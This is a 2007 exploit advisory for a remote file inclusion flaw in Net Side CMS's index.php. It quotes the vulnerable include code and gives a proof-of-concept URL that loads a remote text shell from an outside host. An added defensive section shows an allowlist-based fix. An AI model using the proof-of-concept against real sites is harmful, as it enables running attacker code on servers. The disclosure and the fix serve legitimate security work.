I see your future and your future is death. Sharingan !
--------------------------------------------------------------------------------------------------------------
Hi I'm sharingan and this is my vuln :
script name :
Net Side Content Management System
(2 versions found both vulnerable | Version names not available since the script isn't downloadable)
vuln file :
index.php |and maybe others ... haven't checked|
vuln code version 1:
[...]
if ($_GET["cms"] == "" or $_GET["cms"] == "titel")
{
    include "titel.inc.php";
}
else
{
    include $_GET["cms"].".inc.php";
[...]
vuln code version 2:
[...]
$includepath = "";
[...]
if ($_GET["cms"] == "")
{
    include $includepath."titel.inc.php";
}
else
{
    include $includepath.$_GET["cms"].".inc.php";
[...]
proof of concept :
http://site.com/index.php?cms=http://whatever.com/textshell.txt?
"powered by Net-Side.net"
--------------------------------------------------------------------------------------------------------------
greetz mozi and all php freaks.
oh yeah and a friendly Hi! to RST.
# milw0rm.com [2007-03-24]
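
Added example, not code from Net Side CMS or from the advisory's author: a hardened replacement for both vulnerable include branches above, resolving the cms parameter through a fixed allowlist so that no request data reaches the include path. The page names other than titel, the pages/ directory and the function name resolve_cms_page are assumptions made for illustration.

```php
<?php
// Added example. Page names other than "titel", the pages/ directory and
// resolve_cms_page() are assumptions, not part of Net Side CMS.

// Fixed allowlist: request value => file on disk. Nothing taken from the
// request is ever concatenated into the include path.
const CMS_PAGES = [
    'titel'   => 'titel.inc.php',
    'news'    => 'news.inc.php',     // hypothetical page
    'kontakt' => 'kontakt.inc.php',  // hypothetical page
];

function resolve_cms_page($requested, string $includepath): string
{
    // ?cms[]=x arrives as an array; anything that is not a non-empty
    // string is treated as a request for the default page.
    if (!is_string($requested) || $requested === '') {
        $requested = 'titel';
    }
    // Exact key lookup: URLs, "../" sequences and stream wrappers can
    // never match a key, so they fall back to the default page.
    $file = CMS_PAGES[$requested] ?? CMS_PAGES['titel'];
    return rtrim($includepath, '/') . '/' . $file;
}

// Constructed sample inputs, including the value from the proof of concept.
$samples = [
    '',
    'news',
    'http://whatever.com/textshell.txt?',
    '../other',
    ['x'],
];
foreach ($samples as $s) {
    printf("%-42s => %s\n",
        json_encode($s, JSON_UNESCAPED_SLASHES),
        resolve_cms_page($s, __DIR__ . '/pages'));
}

// In index.php both vulnerable branches then collapse to:
//   include resolve_cms_page($_GET['cms'] ?? '', __DIR__ . '/pages');
// Defence in depth in php.ini: allow_url_include = Off
```

Every input that is not an exact allowlist key, including the remote URL from the proof of concept, resolves to pages/titel.inc.php.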
{"id": "SECURITYVULNS:DOC:16477", "bulletinFamily": "software", "title": "Net Side Content Management System", "published": "2007-03-25T00:00:00", "modified": "2007-03-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16477", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:21", "edition": 1, "viewCount": 16, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7465"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645649601}}